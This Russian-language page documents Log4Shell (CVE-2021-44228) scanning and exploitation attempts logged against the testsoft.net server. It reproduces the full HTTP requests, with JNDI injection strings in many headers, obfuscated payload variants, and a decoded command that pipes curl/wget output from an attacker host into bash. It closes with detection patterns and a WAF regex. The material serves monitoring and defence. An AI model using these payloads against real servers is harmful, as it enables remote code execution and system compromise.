CVE-2021-44228. Мониторинг и обнаружение уязвимости Log4j.

testsoft.net – web bot map – december 2021

На странице содержится информация об уязвимости компонента Log4j, Apache. Ниже представлены примеры атак на web-сервера testsoft по обнаружению CVE-2021-44228 и попытках эксплуатации уязвимости.

167.172.233.101 – testsoft.net (этот web-сервер)
x.x.x.x – IP адрес атакующего
[attackerserver].com – DNS имя сервера атакующего.
[Base64] – кодированый запрос в формате Base64

WEB BOT REQUEST TS-122021-001
Пример http запроса:

GET /?x=${jndi:ldap://x.x.x.x:12344/Basic/Command/Base64/KGN...[Base64]...2g=} HTTP/1.1
Host: testsoft.net
User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://x.x.x.x:12344/Basic/Command/Base64/KGN...[Base64]...2g=}
Referer: http://167.172.233.101:80/?x=${jndi:ldap://x.x.x.x:12344/Basic/Command/Base64/KGN...[Base64]...2g=}
Accept-Encoding: gzip
Connection: close

Декодированый запрос в формате [Base64]:
(curl -s x.x.x.x:5874/167.172.233.101:443||wget -q -O- x.x.x.x:5874/167.172.233.101:443)|bash

WEB BOT REQUEST TS-122021-002
Пример http запроса:

POST /login HTTP/1.1
User-Agent: Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox
Accept: */*
Host: 167.172.233.101
Content-Type: application/x-www-form-urlencoded
Content-length: 46
data=${jndi:ldap://x.x.x.x:1389/Exploit}

WEB BOT REQUEST TS-122021-003
Пример http запроса:

GET / HTTP/1.1
User-Agent: ${jndi:ldap://x.x.x.x:1389/Exploit}
Host: 167.172.233.101

WEB BOT REQUEST TS-122021-004
Пример http запроса:

GET /${jndi:ldap://x.x.x.x:1389/Exploit} HTTP/1.1
User-Agent: Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox
Host: 167.172.233.101
Cookie: test='${jndi:ldap://x.x.x.x:1389/Exploit}'

WEB BOT REQUEST TS-122021-005-EXT
Пример http запроса:

GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-id123456_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.[attackerserver].com%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-id123456_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.[attackerserver].com%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-id123456_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.[attackerserver].com%2F%7D HTTP/1.1
Host: testsoft.net
User-Agent: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.[attackerserver].com/}
Connection: close
Transfer-Encoding: chunked
A-IM: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_A-IM.log4jdns.[attackerserver].com/}
Accept: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Accept.log4jdns.[attackerserver].com/}
Accept-Charset: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Accept-Charset.log4jdns.[attackerserver].com/}
Accept-Datetime: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Accept-Datetime.log4jdns.[attackerserver].com/}
Accept-Encoding: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Accept-Encoding.log4jdns.[attackerserver].com/}
Accept-Language: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Accept-Language.log4jdns.[attackerserver].com/}
Access-Control-Request-Headers: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Access-Control-Request-Headers.log4jdns.[attackerserver].com/}
Access-Control-Request-Method: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Access-Control-Request-Method.log4jdns.[attackerserver].com/}
Authorization: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Authorization.log4jdns.[attackerserver].com/}
Cache-Control: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Cache-Control.log4jdns.[attackerserver].com/}
Connection: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Connection.log4jdns.[attackerserver].com/}
Content-Type: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Content-Type.log4jdns.[attackerserver].com/}
Cookie: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Cookie.log4jdns.[attackerserver].com/}
Date: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Date.log4jdns.[attackerserver].com/}
Forwarded: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Forwarded.log4jdns.[attackerserver].com/}
From: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_From.log4jdns.[attackerserver].com/}
If-Match: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_If-Match.log4jdns.[attackerserver].com/}
If-Modified-Since: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_If-Modified-Since.log4jdns.[attackerserver].com/}
If-None-Match: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_If-None-Match.log4jdns.[attackerserver].com/}
If-Range: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_If-Range.log4jdns.[attackerserver].com/}
If-Unmodified-Since: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_If-Unmodified-Since.log4jdns.[attackerserver].com/}
Origin: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Origin.log4jdns.[attackerserver].com/}
Pragma: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Pragma.log4jdns.[attackerserver].com/}
Proxy-Authorization: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Proxy-Authorization.log4jdns.[attackerserver].com/}
Range: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Range.log4jdns.[attackerserver].com/}
Referer: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Referer.log4jdns.[attackerserver].com/}
TE: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_TE.log4jdns.[attackerserver].com/}
Upgrade: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Upgrade.log4jdns.[attackerserver].com/}
Via: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Via.log4jdns.[attackerserver].com/}
Warning: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Warning.log4jdns.[attackerserver].com/}

${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_body.log4jdns.[attackerserver].com/}

WEB BOT REQUEST TS-122021-006-EXT
Примеры http заголовков для поиска уязвимых серверов со стороны бот-систем:

GET /?v=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A%3A-r%7D%24%7B%3A%3A-m%7D%24%7B%3A%3A-i%7D%3A%2F%2Fx.x.x.x%3A1442%2Flink%7D HTTP/1.1
Host: testsoft.net
User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Accept-Encoding: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Accept: */*
Connection: keep-alive
Referer: https://${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Accept-Charset: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Accept-Datetime: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Accept-Language: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Cookie: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Forwarded: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Forwarded-For-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Forwarded-Proto: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
From: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
TE: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
True-Client-IP: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Upgrade: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Via: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Warning: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Max-Forwards: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Origin: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Pragma: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
DNT: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Cache-Control: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-ATT-DeviceId: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Correlation-ID: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Csrf-Token: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-CSRFToken: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Do-Not-Track: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Foo: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Foo-Bar: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-By: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-For-Original: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-Host: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-Port: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-Proto: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-Protocol: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-Scheme: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-Server: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-Ssl: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarder-For: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forward-For: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forward-Proto: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Frame-Options: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-From: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Geoip-Country: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Http-Destinationurl: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Http-Host-Override: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Http-Method: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-HTTP-Method-Override: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Http-Path-Override: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Https: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Htx-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Hub-Signature: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-If-Unmodified-Since: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Imbo-Test-Config: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Insight: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Ip-Trail: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-ProxyUser-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Requested-With: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Request-ID: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-UIDH: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Wap-Profile: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-XSRF-TOKEN: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}

Дополнительные ссылки по теме:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://tryhackme.com/room/solar
https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java
https://www.youtube.com/watch?v=7qoPDq41xhQ
https://github.com/NCSC-NL/log4shell/blob/main/detection_mitigation/README.md
https://github.com/pedrohavay/exploit-CVE-2021-44228

Известные варианты строк из аномальных запросов:

${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://x.x.x.x/}
${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://x.x.x.x/}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//x.x.x.x/}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//x.x.x.x/}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://x.x.x.x/}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://x.x.x.x/}
${${::-j}ndi:rmi://x.x.x.x/}
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//x.x.x.x:1389/TomcatBypass/Command/Base64/d2d...[Base64]...mVy}')
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//167.172.233.101.[attackerserver].com/link}
%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2Fx.x.x.x%2Fsecurityscan%7D

Патерны для обнаружения попыток эксплуатации уязвимости Log4j:
%24%7bjndi
%2524%257Bjndi
%2F%252524%25257Bjndi%3A
${jndi:ldap:
${jndi:ldaps:
${jndi:rmi:
${jndi:ldaps:
${jndi:dns:
${jndi:nis
${jndi:nds
${jndi:corba
${jndi:iiop
${jndi:${lower:
${::-j}${
${env:BARFOO:-j}
${::-l}${::-d}${::-a}${::-p}
${lower:j}ndi:${lower:l}${lower:d}a${lower:p}:
${upper:j}ndi:${upper:l}${upper:d}a${lower:p}:
${::-j}${::-n}${::-d}${::-i}:
$%7Bjndi:
%2F%252524%25257Bjndi%3A
base64:JHtqbmRp
j}ndi$
jndi%
jndi:
j}ndi
j%7Dndi

Пример regex строки для использования на WAF:
(?s)\$\{.+:.+\}